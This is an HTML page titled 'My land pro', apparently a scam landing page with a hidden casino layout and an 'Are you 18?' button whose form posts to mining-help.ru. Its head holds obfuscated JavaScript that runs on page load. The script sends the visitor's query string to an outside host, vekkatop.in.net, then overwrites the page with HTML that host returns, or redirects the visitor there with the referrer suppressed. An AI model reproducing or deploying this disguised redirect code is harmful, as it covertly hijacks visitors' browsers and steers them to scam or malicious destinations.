<!DOCTYPE html><html  ><head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no">
        <link rel="icon" href="favicon.png" sizes="16x16" type="image/png">
        <title>My land pro</title>
        <link href="1.bundle.9df7293d.css" rel="stylesheet">
        <link href="bundle.0ca08b65.css" rel="stylesheet">
        <link rel="preconnect" href="https://fonts.gstatic.com/">
<link href="css2.css" rel="stylesheet">
<script>var _0x369b=['148145nVjqHZ','1KnzOVM','write','close','responseText','send','1KZBjoE','<html><head>','3oFlqAw','135EZDTJn','status','1vvDXtb','1017779hHEKWd','search','5XuECWr','458033uKbJwc','landing_url','landing_html','[?&]nr=1','<meta http-equiv="refresh" content="0; url=','href','21031cypqMO','3841CjvkZd','" />','https://vekkatop.in.net/index.php?key=y1dyguel8zoxt51qdznb&lp_type=js_redirect&'+window.location.search.substring(1),'parse','1690egDYfd','GET','open','31219ZtOXgR','267dsQspw','</head></html>','<meta content="1628789172781;"/>'];var _0x5e11=function(_0x4cb19d,_0x244c7b){_0x4cb19d=_0x4cb19d-0x6b;var _0x369b4d=_0x369b[_0x4cb19d];return _0x369b4d;};(function(_0x4bc0c1,_0x3810ae){var _0x436d21=_0x5e11;while(!![]){try{var _0x34542f=parseInt(_0x436d21(0x70))*-parseInt(_0x436d21(0x7d))+-parseInt(_0x436d21(0x75))*parseInt(_0x436d21(0x7c))+parseInt(_0x436d21(0x6d))*parseInt(_0x436d21(0x88))+parseInt(_0x436d21(0x73))*parseInt(_0x436d21(0x89))+-parseInt(_0x436d21(0x72))*parseInt(_0x436d21(0x76))+parseInt(_0x436d21(0x85))*parseInt(_0x436d21(0x81))+-parseInt(_0x436d21(0x84))*-parseInt(_0x436d21(0x6f));if(_0x34542f===_0x3810ae)break;else _0x4bc0c1['push'](_0x4bc0c1['shift']());}catch(_0x2f5fe4){_0x4bc0c1['push'](_0x4bc0c1['shift']());}}}(_0x369b,0x99960),!function(){var _0x44ddeb=_0x5e11;if(-0x1==window['location'][_0x44ddeb(0x7b)][_0x44ddeb(0x74)](_0x44ddeb(0x79))){var _0xf5e636=new XMLHttpRequest();_0xf5e636[_0x44ddeb(0x83)](_0x44ddeb(0x82),_0x44ddeb(0x7f),!0x0),_0xf5e636['onload']=function(){var _0x3dd81e=_0x44ddeb;if(0xc8===_0xf5e636[_0x3dd81e(0x71)]){var _0x4e9c69=JSON[_0x3dd81e(0x80)](_0xf5e636[_0x3dd81e(0x6b)]);return _0x4e9c69[_0x3dd81e(0x78)]?(document[_0x3dd81e(0x83)](),document['write'](_0x4e9c69[_0x3dd81e(0x78)]),void document[_0x3dd81e(0x8b)]()):_0x4e9c69[_0x3dd81e(0x77)]?(document[_0x3dd81e(0x83)](),document[_0x3dd81e(0x8a)](_0x3dd81e(0x6e)),document[_0x3dd81e(0x8a)]('<meta name="referrer" content="never" />'),document[_0x3dd81e(0x8a)](_0x3dd81e(0x87)),document['write'](_0x3dd81e(0x7a)+_0x4e9c69[_0x3dd81e(0x77)]+_0x3dd81e(0x7e)),document[_0x3dd81e(0x8a)](_0x3dd81e(0x86)),void document[_0x3dd81e(0x8b)]()):void 0x0;}},_0xf5e636[_0x44ddeb(0x6c)]();}}());</script>
 </head>
    <body style="background: rgba(0, 0, 0, 0) url(&quot;bannerking.jpeg&quot;) no-repeat scroll 50% center / cover;background-position: inherit;">
    	<div style="position: fixed; width: 100%;height: 100%;background-color: rgba(0,0,0,0.5);"></div>
        <div class="container">
            <header class="header" style="visibility: hidden;"></header>
            <main class="main">
                                <div class="text">
                    <div class="title"></div>
                    <div class="percent-block">
                        <div class="percent-number"></div>
                        <div class="percent-text"></div>
                    </div>
                    <div class="cash-block" style="visibility: hidden;">ask</div>
                    <div class="spins-block">Are you 18?</div>
                    <form action="https://mining-help.ru" method="POST" style="text-align: center;"><input name="cparam" type="text" value="" style="display: none;"><button class="button-block" style="background-color: transparent; border: medium none;" id="submit-btn"><span class="button" style="text-decoration-line: underline;">yes</span></button>
                    <div class="icons-circle" style="visibility: hidden;">
                        <div class="icon-chat"></div>
                        <div class="icon-bonus"></div>
                        <div class="icon-slots"></div>
                    </div>
                </form></div>
            </main>
            <footer class="footer">
                <div class="footer-icons" style="display: none;">
                    <div class="icon trustly"></div>
                    <div class="icon ideal"></div>
                    <div class="icon visa"></div>
                    <div class="icon mastercard"></div>
                    <div class="icon skrill"></div>
                    <div class="icon neteller"></div>
                    <div class="icon paysafe"></div>
                </div>
                <div class="footer-icons" style="display: none;">
                    <div class="icon resp-gaming"></div>
                    <div class="icon safe-security"></div>
                    <div class="icon age"></div>
                    <div class="icon laptops"></div>
                </div>
                <div class="footer-copytext">
                    <br>
                    
                </div>
            </footer>
            
    

</div>
</body></html>
